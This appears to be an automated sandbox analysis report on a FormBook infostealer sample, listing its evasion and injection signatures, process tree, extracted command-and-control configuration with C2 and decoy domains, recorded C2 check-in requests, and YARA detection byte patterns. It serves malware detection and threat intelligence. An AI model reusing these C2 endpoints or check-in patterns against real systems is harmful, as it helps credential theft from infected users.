Analysis Report cryptedprof.exe

Overview

General Information

Sample Name: cryptedprof.exe
Analysis ID: 356722
MD5: 72efe20e4a59ae2722383b8786956994
SHA1: 453b2af3b318668926087556eebfa93eda75d2df
SHA256: d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • cryptedprof.exe (PID: 6980 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
    • cryptedprof.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 984 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6592 cmdline: /c del 'C:\Users\user\Desktop\cryptedprof.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}

Yara Overview

Memory Dumps

Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com | Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group | Strings:
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com | Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further entries not shown)

Unpacked PEs

Source: 3.2.cryptedprof.exe.400000.0.raw.unpack
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com | Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group | Strings:
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com | Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 3.2.cryptedprof.exe.400000.0.raw.unpack | Malware Configuration Extractor: FormBook (C2 list and decoy domains as given in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: cryptedprof.exe | ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: cryptedprof.exe | Joe Sandbox ML: detected
Source: 3.1.cryptedprof.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.cryptedprof.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.cryptedprof.exe.2a60000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: cryptedprof.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: cryptedprof.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL | source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: cryptedprof.exe, msdt.exe
Source: Binary string: msdt.pdb | source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004065C1 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004027A1 FindFirstFileA
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.warungsuntik.com/rcv/
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.thatlocaljawn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.warungsuntik.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.tabandolano.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK
Source: unknown | DNS traffic detected: queries for: www.thatlocaljawn.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 23 Feb 2021 14:32:22 GMT | Content-Type: text/html | Content-Length: 479 | Connection: close | ETag: "601d0d01-1df" | Data Ascii (raw hex of the body omitted): <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: cryptedprof.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: cryptedprof.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: msdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmp | String found in binary or memory: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419D60 NtCreateFile
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419E10 NtReadFile
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419E90 NtClose
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419F40 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419D5A NtCreateFile
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419DB4 NtReadFile
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419E8A NtClose
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419F3C NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF95D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk
